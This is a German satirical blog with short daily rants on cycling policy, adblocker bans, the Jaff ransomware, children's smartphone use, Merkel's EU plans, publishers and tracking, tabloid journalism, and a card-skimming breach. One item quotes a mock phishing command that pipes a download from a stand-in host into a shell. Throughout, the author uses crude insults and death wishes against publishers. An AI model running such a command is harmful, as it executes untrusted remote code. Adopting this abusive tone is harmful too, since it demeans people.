Zu schade, dass mir das keiner auszahlt…

Jeder Autokilometer verursacht volkswirtschaftliche Kosten in Höhe von 15 Cent. Jeder auf dem Rad zurückgelegte Kilometer hingegen bringt der Gesellschaft einen Gewinn in Höhe von 16 Cent

Nein, ich habe mir das päjper mit diesem zahlenspiel nicht angeschaut, aber wer 250 kilometer rad gefahren ist, hat ja die rd. 40 øre erwirtschaftet, die man ausgeben soll, um die von der spektrum angegebene kwelle als PDF runterzuladen. Mit sicherheit wahr ist es wenigstens, dass auf fußwegen markierte radwege die unfallwahrscheinlichkeit erhöhen.

Hier in hannover haben sie übrigens eine besonders tolle metode der fahrradförderung. Wenn das geld nicht da ist, um eine mit schlaglöchern übersäte straße zu flicken, werden einfach schilder hingestellt, dass es sich um eine fahrradstraße handele. Das ändert nichts — denn natürlich konnte man da vorher auch mit dem fahrrad fahren, und natürlich gibts hinterher auch noch autoverkehr auf genau dieser straße, und zwar genau so viel wie vorher. Aber die straße bleibt dann einfach noch ein paar jahre länger ungeflickt. Für jene, die nicht so olle schrottfietsen wie ich fahren, sehr ärgerlich. (Und die „alte döhrener straße“ in hannover hat mich schon zwei verdammte speichen gekostet, und ich bin wirklich ein relativ langsamer mensch, vor allem, wenn alle fuffzich meter rechts vor links gilt und lauter verpeilte auf der suche nach einem parkplatz durch die südstadt kreisen. Wenn fußball, eine veranstaltung im funkhaus, das mehrwöchige maschseefest oder vergleichbares läuft, sind die leute auf der suche nach parkplätzen außerdem oft ortsfremd und teilweise deutlich vom ganz normalen wahnsinn des stadtverkehrs überfordert. Da kann man dann gar nicht rasen, wenn man an seinen knochen hängt. Aber hej, es ist eine „fahrradstraße“, die die stadt nicht mehr reparieren muss und die jedes jahr ein bisschen beschissener aussieht. Zumindest geht die stadt so damit um. Toll!)

Advertisements

Es scheint so weit zu sein…

In der BRD liegt ein gesetzliches verbot von adblockern in der luft

Die arschlöcher von presseverlegern, die so etwas in den dunkelkammern des reichstages anleiern, sind nun einmal nichts anderes als eure feinde. Ob eure kompjuter von irgendwelchen kriminellen gepwnt werden, ist denen scheißegal, so lange nur ihr geschäftchen läuft.

Wie man immer beim bullschittbingo gewinnt

Diese t3n-schleichwerbung im redakzjonellen teil mit einem tollen interwjuh mit Daniel Krantz, dem leiter irgendeiner entwicklungsabteilung beim lotto-versand ist eine gewinngarantie bei jeder runde bullschitt-bingo. Da kriegt man nicht nur eine reihe voll, da kriegt man blitzeschnell ganze karten mit voll. Der lässt nix aus! :mrgreen:

Hier nur als anregendes appetithäppchen die erste antwort von Daniel Krantz:

Wir haben ein modulares System entwickelt. Dazu haben wir das App Acceleration Center etabliert und können so binnen acht Wochen eine neue App umsetzen. Wir fahren also in der gesamten Otto Group einen Open-Source-Ansatz. Heißt: Wir entwickeln modulare Features, die dann jede Gesellschaft innerhalb des Konzerns übernehmen kann. Die Basis für die Apps bilden dabei meist die Responsive Websites

Das wird noch viel leckerer im verlaufe des textes.

Zu schade, dass t3n so eine völlig unrelativierte schleichwerbekacke nötig zu haben glaubt, aber hej, dann kommt halt bald der insolvenzverwalter, das ist nicht mein problem…

Sicherheitsproblem des tages

Wer auf die Mail hereinfällt und das PDF öffnet, fängt sich Jaff aber noch nicht ein. Erst muss man in der PDF-Anwendung eine Sicherheitswarnung mit einem Klick auf „OK“ abnicken. Anschließend wird ein Word-Dokument mit Makros aus dem PDF extrahiert und geöffnet. Nun muss ein Opfer noch die Makros aktivieren. Erst dann findet die Infektion mit Jaff statt

Sorry, aber wer das macht, kann auf mein mitleid nicht mehr rechnen. Nach so viel mühe hat man sich den erpressungstrojaner aber auf anständige weise selbst verdient. Bei so viel konzentriertem informazjonstechnischen analfabetismus an den tasten hilft auch das sicherste betrübssystem nicht weiter. Wenn man derartige vollpfosten etwa vor einem un*xoiden system setzt und die kriegen da eine spämm mit dem text: „unser voll sicheres sicherheitsverfahren zur erhöhung der sicherheit erfordert eine aktivierung an ihrer kommandozeile, damit sie die angehängten dokumente lesen können, bitte geben sie die anweisung curl http://example.net/blah/ | sh in einer konsole ein! Vielen dank für ihr verständnis!“ — die machen das! Und die kommen sich dabei noch wichtig und kompedingsda vor, weil sie eine tolle, sichere sicherheitszeile von hand abtippen können. (Das mit der zwischenablage werden sie wohl nicht verstehen, und dass man unter X seit rd. 25 jahren einfach mit der mittleren maustaste den woanders markierten text einfügen könnte, wissen sie auch nicht und werden sie auch nie lernen, denn sie brauchen es ja nicht zu wissen.) Die größte sicherheitslücke ist immer noch der digitale analfabet vor dem kompjuter, und dieser analfabet wird mit hohem aufwand systematisch hergestellt, weil man verdummten menschen, die angst vor eigenem wissen und können haben, einfach viel mehr zeugs verkaufen kann. Wischofone zum beispiel. Oder antivirus-schlangenöle. Oder lichtschalter mit internetz. Ach!

Nicht daten sind der rohstoff der zukunft. Dummheit ist der rohstoff der zukunft.

Ach, apropo dummheit: Warum — und vor allem wozu — im namen von drei schwefelkackenden höllenhunden kann man an ein PDF-dokument ein wörd-dokument anhängen? Was ist der intendierte anwendungsfall für dieses funkzjonsmerkmal? Und wie oft wird dieses funkzjonsmerkmal von anwendern genutzt? Wer sinnlos aufgeplusterte softwäjhr von klischen wie „adobe“ (engl. für: gebrannter lehmziegel) benutzt, setzt sich damit auch ziemlich überflüssigen risiken aus.

Patologisierung des tages

Wer kümmert sich in der BRD eigentlich um die kompjuternutzung von kindern? Richtig, es ist…

[…] die Bundesdrogenbeauftragte Marlene Mortler

…Marlene Mortler, die bummsdrogenbeauftragte von der rechtspopulistischen oans-zwoa-g’suffa-bierzelt-partei CSU. Das muss daran liegen, dass kompjuter eine droge sind, so eine art digitales heroin. Gut, dass die nix gegen die volxdroge nummer eins in der BRD sagt, den alkohol. Prost!

Und nachdem ihr einen ordentlichen schluck aus der pulle genommen habt, liebe eltern, legt eure kinder wieder vor der glotze ab, damit sie wieder glotzen! Winke, winke, teletubbie! Ist nur zum besten eurer kinder! Kompjuter und wischofone machen entwicklungsschäden.

Und die ausgewaxenen menschen, die sich mit stöpseln in den ohren und entschlossen auf das wischofon gerichteten augen, aber leider ohne die mitwelt warnende, gelbe armbinde mit drei schwarzen punkten drauf durch den straßenverkehr bewegen — teilweise sogar in den tonnenschweren metallmaschinen, mit denen sie ihren trägen arsch vom sessel zum arbeitsplatz und dann zum schopping fahren lassen — können einfach weitermachen und vielleicht auf ihrem an gesehenem armen lebensweg auch mal das eine oder andere kind totmachen, denn es geht hier ja nur um die gefährliche kompjuternutzung durch kinder, gegen die man etwas tun muss.

Allerdings halte ich diese empfehlung für falsch:

Kinder sollten nicht vor dem 12. Geburtstag ein Smartphone bekommen

Kinder sollten überhaupt kein wischofon heutiger bauart bekommen und sich gar nicht erst von früh auf daran gewöhnen, mit kompjutern zu arbeiten, auf denen sie nicht selbst die softwäjhr installieren können, die sie für richtig halten — und an die ganze mit so einem wischofon klandestin daherkommende überwachungsscheiße sollten sie sich auch besser nicht gewöhnen. Es könnte nur sein, dass das inzwischen gar nicht mehr machbar ist, weil kinder ja spätestens ab der einschulung ständig für mitschüler, eltern und lehrer erreichbar sein müssen… 😦

Weia, bin ich froh, dass ich keine kinder in diese scheißwelt gesetzt habe!

Wahlkampfpropaganda des tages

Damit bummskanzlerin Angela Merkel auch wirklich echt jetzt mal ganz sicher nach der näxsten bummstagswahl bummskanzlerin bleibt, veröffentlichen die kwalitätsjornalisten von der FAZ ihren ganz geheimen geheimplan, der sicherlich auch dem einen oder anderen AFD-wähler gefallen wird:mrgreen:

Dabei werden auch ganz geheime geheimerkenntnisse zum besten gegeben:

Merkel hat beobachtet, wie sich auch in der Bevölkerung die Stimmung veränderte. Schon in den Wochen nach der britischen Abstimmung meldeten die Demoskopen aus Allensbach, durch den Schock seien den Deutschen „die Vorteile der Europäischen Union bewusster geworden“. Zum ersten Mal seit dem Mauerfall wünscht sich eine relative Mehrheit der Deutschen eine schnellere europäische Einigung. Bestätigt fühlt sich die Kanzlerin auch von den Demonstranten, die in deutschen Großstädten „für Europa“ auf die Straße gingen („Pulse of Europe“), und vom bescheidenen Abschneiden der Europaskeptiker bei den Wahlen in den Niederlanden und in Frankreich

Hej, macht doch einfach mal eine volxabstimmung über einen BRDexit! Ich glaube, das ergebnis würde etwas anders als diese „relative mehrheit“ aussehen, die es übriges — achtung, zensor war pinkeln — angeblich zum ersten mal seit jahrzehnten gegeben hat. 😈

In Brüssel wird eine Kommandozentrale für gemeinsame Militäreinsätze aufgebaut […] die doppelte Bedrohung durch Russland und Trump schafft bei den Osteuropäern neue Offenheit

Zumindest ich fühle mich weder vom amtierenden präsidenten der USA noch vom russischen staatspräsidenten bedroht.

„Aus deutscher Sicht ist es möglich, die Verträge zu ändern“, sagt sie jetzt, „wenn man das braucht, um die Eurozone zu stärken.“

Juchu, eine stärkung der brüsseler korruptokratie mit ihrem politbüro… ähm… kommissariat und ihrem machtlosen teaterparlament aus abnickern und händchenhebern ohne inizjativrechte. Das wirds bringen, aber ganz sicher! Für einige. Die meisten menschen in BRD und EU gehören allerdings nicht dazu.

Moment, wie kann man den gekwirlten scheißdreck mal propagandistisch verkaufen? Ach ja, nehmen wir ein paar kinder und junge menschen, das geht immer:

Während die beiden Ressortchefs im Finanzministerium vor die Presse traten, diskutierte Merkel in Berlin-Pankow mit Schülern über Europa. Auch da ließ sie ihrer neuen Europabegeisterung freien Lauf. „Ich habe hier gespürt, welche Faszination Europa entwickeln kann“, sagte sie – und versprach, in ihrer Politik „die Wünsche und Träume der jungen Menschen stärker zu berücksichtigen“.

Hach, da hat sich die ehemalige FDJ-beauftragte für agitazjon und propaganda fast wie damals bei der FDJ gefühlt! Nur die blauen hemdchen gibts halt nicht mehr. Aber vielleicht kommen die auch noch zurück… :mrgreen:

Scheißpresse des tages

Die scheißpresseverleger so: Wenn wir nicht mehr unsere feind… ähm… die ganzen von uns verdummten menschen, die nicht wissen, wie man das annehmen von cookies von drittanbietern im webbrauser deaktiviert, seit-übergreifend träcken und in einem großteil ihrer internetznutzen verdaten können, bricht unser geschäftsmodell zusammen.

Browser-Hersteller sollen verpflichtet werden, alle Voreinstellungen Privatsphäre-freundlich zu gestalten. Damit könnten die Nutzer zentral ihre Einwilligung erklären, Daten weiterzugeben – oder diese Zustimmung verweigern […] Allerdings seien die vorgeschlagenen Regeln eine Gefahr für das digitale Geschäft mit Nachrichten. Die Unternehmen befürchten, dies könne in der Praxis dazu führen, dass kaum noch Nutzer dem Datentransfer zustimmen

Manchmal sind sie die professjonellen lügner mit presseverlagshintergrund ja doch ein bisschen ehrlich, wenn auch in verschrobener ausdrucksweise… aber dann kehrt — zumindest bei heise — auf einmal ein bisschen richtige, leicht verständliche wahrheit in den zeilen ein:

Eine europäische Verleger-Allianz befürchtet, dass sie damit keinen Zugriff auf Nutzerdaten hätte

Weil… müsst ihr verstehen: der erste geschlechtsverkehr mit einer frisch vermählten frau… ähm… der zugriff auf nutzerdaten ist das natürliche recht eines presseverlegers! :mrgreen:

Hej, scheißpresseverleger! Die großen brauser sind kwelloffene und Freie softwäjhr. Baut doch einfach euren eigenen, den nutzer von vorne bis hinten träckenden und mit reklame vollballernden scheißpresse-webbrauser, und setzt den einfach voraus, wenn jemand eure drexseits lesen will! Wenns euch im freien internetz nicht gefällt, geht gefälligst nach drüben, statt jeden tag für die abschaffung der letzten Freiheiten in PResseerklärungen und offenen briefen zu heulen! Ach, so ein scheißpresse-webbrauser passt nicht zu eurem widerwärtigen geschäftsmodell, S/M-seits mit clickbait-links auf euren informazjons-müllfraß zu fluten, um über diesen hebel reklameplätze zu vermarkten, weil ganz viele dumme menschen mit ihrem ganz normalen webbrauser darauf klicken? Na, dann denkt euch doch einfach mal ein seriöses und tragfähiges geschäftsmodell anstelle eurer leserverachtung aus, ihr fäkalmaden!

Stirb, scheißpresse, stirb! Verrecke, verleger, verrecke!

Kwalitätsjornalismus des tages

Die langjährige gesellschaftliche kultiviererin von fäjhknjuhs und häjhtspietsch, die scheiß-bildzeitung, hat mal wieder — scheiß auf die eltern, scheiß auf verwandte, scheiß auf freunde — ein paar terrortote kinder durchgeschüttelt, ob da vielleicht noch ein paar klickercents rausfallen, und sie dann als content verwurstet.

Übrigens: wer nicht möchte oder es seinen freunden und verwandten ersparen möchte, dass er nach einem möglichen spektakulären todesfall derartig für eine handvoll euro von madenhaften scheißjornalisten ausgebeutet wird, sollte peinlich genau darauf achten, dass für derartig menschenverachtendes jornallje-geschmeiß im fratzenbuch keine fotos von ihm zu finden sind. Die nehmen nämlich alles, was sie kriegen können, um eine breitere reklamevermarktung machen zu können, diese riesengroßen stinkenden arschlöcher.

Bargeldabschaffung des tages

Die US-amerikanische Restaurant-Kette Chipotle Mexican Grill warnt ihre Kunden vor dem Missbrauch ihrer Kredit- und Debitkarten. Zwischen 24. März und 18. April 2017 sei Malware auf Computerkassen in vielen (aber nicht allen) Filialen der Firma aktiv gewesen mit dem Ziel, die von den Bezahlterminals eingelesenen Daten von den Magnetstreifen von Bezahlkarten zu stehlen. Diese „Track Data“ enthalten demnach in manchen Fällen die Kreditkartennummer, das Ablaufdatum der Karte, den internen Verifizierungscode sowie auch den Namen des Besitzers der Karte

Aber hej, dieses bargeld, mit dem wir immer bezahlen, das schafft ja nur kriminalität… :mrgreen: